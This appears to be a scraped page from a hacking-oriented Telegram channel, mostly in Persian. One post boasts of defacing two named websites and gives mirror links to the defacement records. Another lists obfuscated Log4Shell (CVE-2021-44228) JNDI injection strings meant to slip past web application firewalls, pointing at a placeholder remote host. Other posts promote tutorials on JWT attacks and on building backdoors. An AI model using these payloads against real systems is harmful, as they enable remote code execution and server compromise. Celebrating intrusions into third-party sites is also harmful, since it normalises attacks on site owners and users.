0Day.Today | Learn Exploit | Zero World | Dark web |
18.7K subscribers
1.22K photos
122 videos
487 files
1.25K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
#Hacked By #X0P4SH4
[+] X0P4SH4 - iliyahr - R4DIKALL - AT7 - EVIL_BOY - Milad Hacking - MMD B4YPASS - S1R4M1R [+]

https://student.waybright.com
http://www.zone-h.org/mirror/id/38957167

https://academy.waybright.com
http://www.zone-h.org/mirror/id/38957166

0Day.Today
@LearnExploit
@Tech_Army
CVE-2021-44228

* کشف آسیب پذیری بسیار جدی در کتابخانه Log4J *

کشف آسیب پذیری بسیار خطرناک به نام LogShell که در کتابخانه Log4J وجود دارد .

شرکت نرم افزاری Apache پچ امنیتی مربوط این آسیب پذیری که از نوع Zeroday بود رو منتشر کرد که این کتابخانه به طور فعال مورد فعال مورد سوء استفاده قرار میگیرد.

این آسیب پذیری این اجازه رو به هکر میده که از راه دور اقدام به کد زدن بکنه ( RCE )

جان گراهام کامینگ مدیر ارشد CloudFlare در این رابطه میگوید :

به‌دلیل استفاده‌ی گسترده از جاوا و log4j، این آسیب‌پذیری بسیار جدی و خطرناک است. حجم عظیمی از نرم‌افزار جاوا به اینترنت و سیستم‌های بک‌اند متصل است. وقتی به ‍۱۰ سال گذشته نگاه می‌کنم، تنها دو آسیب‌پذیری مشابه دیگر به ذهنم می‌رسد: یکی Heartbleed که به شما امکان می‌دهد به اطلاعات سرورهایی دسترسی پیدا کنید که باید امن باشد و دیگری Shellshock که به شما امکان اجرای کد روی سیستمی از راه دور را می‌داد.

نسخه های دارای آسیب پذیری » 2.0 تا 2.14.1
نسخه فیکس شده » 2.15.0

Exploit

Another Exploit On Github

#RCE #Log4J #Java
——————
0Day.Today
@LearnExploit
@Tech_Army
0Day.Today | Learn Exploit | Zero World | Dark web |
Log4Shell Detector v0.1 زیاد تست نشده چون ورژن اول هست ممکنه یک سری مشکلات داشته باشه ولی کار میکنه Github #Log4J #Java —————— 0Day.Today @LearnExploit @Tech_Army
Apache Log4j 2.14.1 RCE (CVE-2021-44228)

Bypass WAF :

1- ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}

2- ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}

3- ${jndi:rmi://adsasd.asdasd.asdasd}

4 - ${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}

5- ${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}

6- ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}

7 - ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

Bypass RC1 :

${jndi:ldap://127.0.0.1:1389/ badClassName}

Github

#Log4J #Java
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش حملات JWT در کالی لینوکس

Website

#webapp #jwt #kali

AT7
——————
0Day.Today
@LearnExploit
@Tech_Army
کشف آسیب پذیری دوم و جدید در ورژن 2.15 در Log4j با شناسه CVE-2021-45046

این بار به جای Log4shell ما Log4dos رو شاهد هستیم که روی تارگت میخوره

باید به ورژن 2.16 اپدیت کنید یا Jndi رو کلا غیرفعال کنید .

تمامی نسخه های Log4j از Beta9-2.0 تا 2.12.1 /2.13.0 و 2.15.0 آسیب پذیر هستند

#Log4J #Log4dos #Log4shell
——————
0Day.Today
@LearnExploit
@Tech_Army
👍1
آموزش ابزار commix و ساخت بکدور در آن

Website

#oscommandinjection #commix #kali #backdoor

AT7
——————
0Day.Today
@LearnExploit
@Tech_Army
1
sudo rm -rf 2021
sudo mkdir 2022

iliyahr
——————⁧
0Day.Today
@LearnExploit
@Tech_Army
🔥9
Gray Hat Hacking and Complete Guide to hacking

#book
——————⁧
0Day.Today
@LearnExploit
@Tech_Army
👍4
آموزش ابزار Photon در زمینه Osint

Github

#Osint #kali #linux #tools

iliyahr
——————⁧
0Day.Today
@LearnExploit
@Tech_Army
👍1